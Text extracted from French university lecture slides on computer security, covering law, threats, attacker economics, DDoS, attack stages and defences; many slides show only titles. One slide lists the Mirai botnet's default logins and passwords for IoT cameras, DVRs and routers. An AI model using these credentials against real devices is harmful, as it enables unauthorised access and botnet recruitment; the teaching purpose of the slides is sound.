Académique Documents
Professionnel Documents
Culture Documents
Fabrice Prigent
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 1/1
"Tu es fort petit, très fort, mais tant que je serais dans
le métier, tu ne seras jamais que le second."
The MASK
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 2/1
Pirater n’est pas un jeu
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 3/1
Dura Lex Sed Lex
Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions "possibles".
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 4/1
Dura Lex Sed Lex : résumé
Pour résumer
"Pas vu, Pas pris
Vu : Niqué !"
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 5/1
Phrases essentielles
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 6/1
Quel est l’objectif de la sécurité informatique ?
Protéger l’informatique ?
Intégrité ?
Confidentialité ?
Disponibilité ?
Empêcher les accès aux utilisateurs ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 7/1
En-êtes vous sûrs ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 8/1
La bonne définition
Protéger l’entreprise
Y compris sa version non informatique
Internet des objets (caméras,
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 9/1
Comment faire
Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 10 / 1
Évaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
attention les menaces internes ne représentent que de 1 à 7 %
des attaques.
La sécurité se mesure-t-elle ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 11 / 1
Les difficultés
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 12 / 1
Le contexte : Internet
Historique
Connexion de bout en bout
Réseau ouvert
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 13 / 1
Historique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 14 / 1
Connexion de bout en bout
les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 15 / 1
Réseau ouvert
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 16 / 1
Les risques
Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 17 / 1
Destruction de données
Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 18 / 1
Perte de marché
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 19 / 1
Pertes financière et boursière
Exemple de Yahoo
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 20 / 1
Pertes financière et boursière
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 21 / 1
Pertes financière et boursière
Cause ou conséquence ?
http://riskbasedsecurity.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 22 / 1
Perte de temps et donc d’argent
Arrêt de la production
Recherche des causes
Remise en état
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 23 / 1
Risques juridiques
Lois françaises
Échanges illégaux (terrorisme/pédopornographie/P2P),
Attaques par rebond,
Confidentialité des données personnelles (Article 226-17 et
Article 226-34),
Loi européenne
GDPR / RGPD (Règlement européen : 25 Mai 2018).
2 à 4% du chiffre d’affaire mondial
10-20 Mepour les administrations
Les résultats du RGPD
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 24 / 1
Les menaces : attaques
Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 25 / 1
Les attaques : pré-historique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 26 / 1
Le vocabulaire officiel
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 27 / 1
Les attaques : historique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 28 / 1
Les attaques : contemporain
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 29 / 1
Les attaques : contemporain 2
2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, Ashley
Madison, Backdoor Cisco,
2016 : DNC, Méga DDos, IoT, Shadow Brokers,
2017 : Cryptominers, Equifax, Accenture, AWS public bucket,
Wannacry
2018 : Meltdown et consorts, les bibliothèques
(event-stream), memcached et DDoS,
2019 : Année ransomware. Russie contrôle son Internet. Les
certificats EV deviennent inutiles, Cryptostealer (voleur de
cybermonnaie).
2020 : Les VPN sont piratés, faille Zerologon, 1 portefeuille
bitcoin de 1 milliard de $ vidé, Encrochat, SolarWind.
2021 : Proxylogon, ProxyToken, 600 millions $ de bitcoin
volés, Fuite T-mobile 100 millions de comptes,La CIA aide la
chaine, Pegasus de NSO
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 30 / 1
Ashley Madison
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 31 / 1
Les attaques et événements : 2022
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 32 / 1
Les attaques et événements : 2022
Cisco piraté
Le chef du cybergana "Evil Corp" est le gendre d’un
responsable du FSB
Attaque navigateur dans un navigateur
Cracker sa Hyundai avec Google
1500 clients de Orange Cyberdefense dans la nature
Juste le mois de septembre 2022
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 33 / 1
Les attaques "rigolotes"
Le capteur luminosité utilisé pour détecter la timezone d’un
client web
Les capteurs d’orientation des smartphone pour deviner vos
mots de passe
IOS fitness pulsation cardiaque/ validant les achats grâce à la
lecture "au dessus" de l’empreinte digitale
Détecter le mot de passe par les mouvements d’épaule dans
Zoom ou Teams.
Piratage d’une ceinture de chasteté
Faire un copier coller piégé
Planquer un virus dans la mémoire des cartes graphiques
Macron et son dossier vaccination COVID
Un câble USB espion.
Pirater le 2FA par SMS grâce ... aux voitures
Cette personne n’existe pas
le mail qui casse les IOS
Récupérer automatiquement un logo
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 34 / 1
Le phénomène Cryptolocker
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 35 / 1
Le phénomène Cryptolocker 2
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 36 / 1
Le phénomène cryptolocker: l’argent
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 37 / 1
Hacktivisme
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 38 / 1
Hacktivisme
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 39 / 1
Hacktivisme
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 40 / 1
Hacktivisme
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 41 / 1
Hacktivisme
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 42 / 1
Les attaques : en temps réel
http://cybermap.kaspersky.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 43 / 1
Les rançongiciels en temps réel
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 44 / 1
Les attaques : en temps différé
https://zone-h.org
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 45 / 1
Les attaques : en temps différé
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 46 / 1
Les attaques : en temps différé 2
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 47 / 1
Niveau des attaques
Niveau
Fast Flux
Utilisation de SNMP
Backdoor
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 48 / 1
Type des attaquants : par compétence
Script Kiddy
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers, techniques, parfois
préparatoires)
0days possibles, voire courants.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 49 / 1
Type des attaquants : par objectif
L’argent
piratage volumétrique
cryptolocker/cryptominage
Hacktiviste
"Terroriste"
Anonymous
Espions
Etatique
Industriel
"Petit con"
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 50 / 1
Évolution des attaquants
Ne pas se méprendre
Si la moyenne des pirates est plus bête qu’avant,
les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 51 / 1
Compétences des pros
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 52 / 1
Compétences des pros
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 53 / 1
But des attaques
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 54 / 1
Économie cybercrimininalité : version simplifiée
Chinese
TuringFarm
SCAM
Captcha
Piratage
Protection d’une
Serveur Web entreprise
Massmailing
Virus
Chantage
Phishing
crédibilisé
Bot
par mot de passe
PC Vol
d’identité Doxing
Usurpation
DDoS Racket
Déstabilisation
d’une entreprise Disparition
Pirate concurrent
Argent
Cryptolocker
Spam Viagra
Cryptominage
Spam Blog
Protection IP FAI
Firewall, Blacklist bullet proof
Intrusion
XSS
Serveur
Faux
Call Center
Site de
phishing
ou de vente
Site
médicaments
"WaterHole"
Faille Ver
Espionnage
Game Cracking
Jeu
Cheat
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 55 / 1
Économie Virale : quelques chiffres
Phreaking téléphonique : 2 000 - 70 000 epar attaque réussie.
en 2019, pour un investissement de 500 $ dans un RaaS, on
obtient 3000 $ en 3 mois.
30% des américains ont acheté après un spam.
ROI de "indian herbal" : coût 0,1 centimes, vendu 65 e.
Vol d’identité.
Perte estimée pour le vol d’une identité : 400 e(bénéfice pour
le pirate : entre 50 et 100 e))
en 2007, l’estimation des pertes dues à la cybercriminalité était
de plus de 1 milliard par an.
Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600
milliards $
Virus locky a rapporté 100 M$.
Le "RaaS" Gandcrab se retire après avoir fait payer 2 milliards
de $ aux victimes.
Le "Cheat" jeu vidéo rapporterait plus que la cybercriminalité
classique.
Pourquoi les sites porno et les sites proxy sont gratuits ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 56 / 1
Proposition d’emploi
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 57 / 1
Proposition de services
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 58 / 1
Prix de failles
https://zerodium.com/program.html
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 59 / 1
Prix de failles mobile
https://zerodium.com/program.html
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 60 / 1
Type des attaques
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 61 / 1
Attaque D.O.S.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 62 / 1
Attaque D.D.O.S.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 63 / 1
Evolution des DDoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 64 / 1
Déni de service contre akamaï avec memcached
source https://www.bleepingcomputer.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 65 / 1
Type de D.O.S.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 66 / 1
Type de D.O.S.
Saturation de la CPU
10 zombies mais les machines sont "grillées", connaissances
pointues
exemple: requêtes SQL massive
Lutte : limitation de la CPU (noyau), mod_evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Empoisonnement des caches CDN
Patch régulier, durcissement noyau, protection applicative
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 67 / 1
Et si kon ve fer mé kon sé pa
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 68 / 1
Piske ma copine me quitte, je DDoS
source
https: // pasillo. renater. fr/ weathermap/ weathermap_
metropole. html
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 69 / 1
La protection DDoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 70 / 1
La protection DDoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 71 / 1
Pause TP : DDoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 72 / 1
Connaître pour de vrai les attaques: Mitre
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 73 / 1
Mitre: sous catégorie
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 74 / 1
Mitre: explication
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 75 / 1
Mitre: un exemple d’APT
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 76 / 1
Déroulement d’attaque phishing
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 77 / 1
Déroulement d’attaque infection
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 78 / 1
Déroulement d’attaque infection / protection
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 79 / 1
Déroulement d’attaque infection contournement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 80 / 1
Déroulement d’attaque intégration botnet
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 81 / 1
Déroulement d’attaque infection pour Spam/Virus
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 82 / 1
Déroulement d’attaque infection pour DDoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 83 / 1
Déroulement d’un piratage web
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 84 / 1
Déroulement d’un piratage réseau
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 85 / 1
Cryptolockeur simple
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 86 / 1
Cryptolockeur lourd
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 87 / 1
Déroulement d’une attaque intrusion
Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités → intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 88 / 1
Collecte des informations
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 89 / 1
Attaques : quelques statistiques à l’UT1
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 90 / 1
Attaques : incidents à l’UT1
106 incidents de sécurité depuis 15 ans dont
1 cryptolocker
18 incidents de phishing
57 virus (sortants ou crypto) sur des postes
2 intrusions automatiques (vers) sur des serveurs
1 boite noire piratée (ShellShock)
2 "DDoS" réussis en Février 2015.
Année Total Virus Phishing Autres Commentaires
2021 7 0 0 7 Faille, DoS, HIBP
2020 13 4 0 9 Cryptolocker, HIBP
2019 22 8 2 12 Escroquerie, HIBP
2018 18 8 2 8 Piratage serveurs, HIBP
2017 8 3 4 1 Parasitisme avancé
2016 12 6 1 5 3 DoS, 2 extorsions
2015 16 8 4 4 2 DoS
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 91 / 1
Attaques : nombre mensuel de tests
100 k
0
ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 92 / 1
Attaques : nombre d’attaquants
5 k
4 k
3 k
2 k
1 k
0
ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 93 / 1
Attaques : raisons de la quarantaine sur une journée
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 94 / 1
Mais en vrai, que vois-tu ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 95 / 1
Pourquoi les services sont vulnérables ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 96 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 97 / 1
Site de recensement de failles
sources:
https: // www. cvedetails. com ,https: // cve. mitre. org
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 98 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 99 / 1
Site d’utilisation de failles
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 100 / 1
Plus méchant : distribution de icepack
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 101 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 102 / 1
Les antivirus
Exemple de Virustotal
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 103 / 1
Quand ce n’est pas Google qui les héberge
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 104 / 1
M’en fous
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 105 / 1
Le code signing
source
https://www.bleepingcomputer.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 106 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 107 / 1
Vulnérabilités de septembre 2021
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 108 / 1
Vous voulez prendre le contrôle de caméras (Mirai)?
source https://krebsonsecurity.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 109 / 1
Version plus lisible
Matériel Login Password
ACTi IP Camera admin 123456
ANKO Products DVR root anko
Axis IP Camera root pass
Dahua Camera root vizxv
Dahua DVR root 888888
Dahua DVR root 666666
Dahua IP Camera root 7ujMko0vizxv
Dahua IP Camera root 7ujMko0admin
Dahua IP Camera 666666 666666
Dreambox TV receiver root dreambox
EV ZLX Two-way Speaker root zlxx
Guangzhou Juan Optical root juantech
H.264 – Chinese DVR root xc3511
HiSilicon IP Camera root klv1234
HiSilicon IP Camera root jvbzd
IPX-DDK Network Camera root admin
IQinVision Cameras root system
Mobotix Network Camera admin meinsm
Packet8 VOIP Phone root 54321
Panasonic Printer root 00000000
RealTek Routers root realtek
Samsung IP Camera admin 1111111
Shenzhen Anran Security Camera root xmhdipc
SMC Routers admin smcadmin
Toshiba Network Camera root ikwb
Ubiquiti AirOS Router ubnt ubnt
VideoIQ supervisor supervisor
Vivotek IP Camera root <none>
Xerox printers admin 1111
ZTE Router root Zte521
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 110 / 1
Heureusement Microsoft nous protège
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 111 / 1
Microsoft et ses vulnérabilités
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 112 / 1
Microsoft vous protège du flash
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 113 / 1
Heureusement j’ai Windows 10
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 114 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 115 / 1
Les plus grosses fuites de données
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 116 / 1
Les plus grosses attaques ransomwares
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 117 / 1
Ma banque elle, elle risque rien
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 118 / 1
Ma banque elle, elle risque rien
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 119 / 1
Les entreprises piratées assument
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 120 / 1
Les entreprises piratées assument
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 121 / 1
Les entreprises piratées assument
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 122 / 1
Les entreprises piratées assument (2)
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 123 / 1
Mais il y a des sociétés d’experts
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 124 / 1
Mais il y a des sociétés d’experts
OSSIR
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 125 / 1
Mais on a des instances pour nous protéger
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 126 / 1
Mais on a des instances pour nous protéger
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 127 / 1
Les services de contre-espionnage nous protègent
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 128 / 1
M’en fous j’ai un VPN/mail anonymisateur de la mort qui
tue
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 129 / 1
M’en fous j’ai un VPN/mail anonymisateur de la mort qui
tue
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 130 / 1
Ouais, mais les entreprises piratées n’ont rien sur moi
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 131 / 1
Ouais, mais les entreprises piratées n’ont rien sur moi
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 132 / 1
Ouais, mais on s’en fout c’est virtuel
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 133 / 1
Les plus dangereuses fuites de données : Marriott
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 134 / 1
Les plus dangereuses fuites de données : police
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 135 / 1
Pourquoi dans le désert Irakien on voit ça ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 136 / 1
Et en France ?
Et en France ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 137 / 1
Que du virtuel hein ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 138 / 1
Que du virtuel hein ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 139 / 1
Heureusement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 140 / 1
Shodan, Censys, Zoomeye etc.
http://www.shodan.io
https://censys.io
https://www.zoomeye.org
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 141 / 1
Résolution des problèmes
La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 142 / 1
La tronçonneuse
On enlève l’inutile :
Protection contre l’extérieur;
Protection contre l’intérieur;
Protection à l’intérieur.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 143 / 1
Protection contre l’extérieur
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 144 / 1
Protection contre l’intérieur
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 145 / 1
Protection à l’intérieur
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 146 / 1
Le ciseau à bois
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 147 / 1
Le courrier électronique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 148 / 1
Le Web
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 149 / 1
Les services
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 150 / 1
Le reste
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 151 / 1
Le papier de verre
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 152 / 1
Les logs sont nos amis
Les journaux sont nos seuls amis. On va donc faire appel à eux
pour
Les machines internes qui déclenchent des alertes.
Les services qui sont auscultés par l’extérieur
Les alertes récurrentes
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 153 / 1
Les actions de salubrité publique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 154 / 1
La lazure
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 155 / 1
La machine à remonter le temps
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 156 / 1
La dynamo
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 157 / 1
On ferme à clé
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 158 / 1
Les actions de salubrité publique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 159 / 1
Préservation des webmestres
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 160 / 1
Constats
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 161 / 1
Solutions
Programmer correctement
Les variables
Spécialiser la protection
Modules spécialisés
mod-security
Reverse-proxy
Authentifier, chiffrer
Certificats / chiffrement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 162 / 1
Les applications web
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 163 / 1
Problème générique des failles
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 164 / 1
Structure d’un service web
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 165 / 1
20 points de vulnérabilités
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 166 / 1
Les types de paramètres
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 167 / 1
Les variables GET
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 168 / 1
Les variables POST
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 169 / 1
Les variables cookies
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 170 / 1
Les variables SERVER
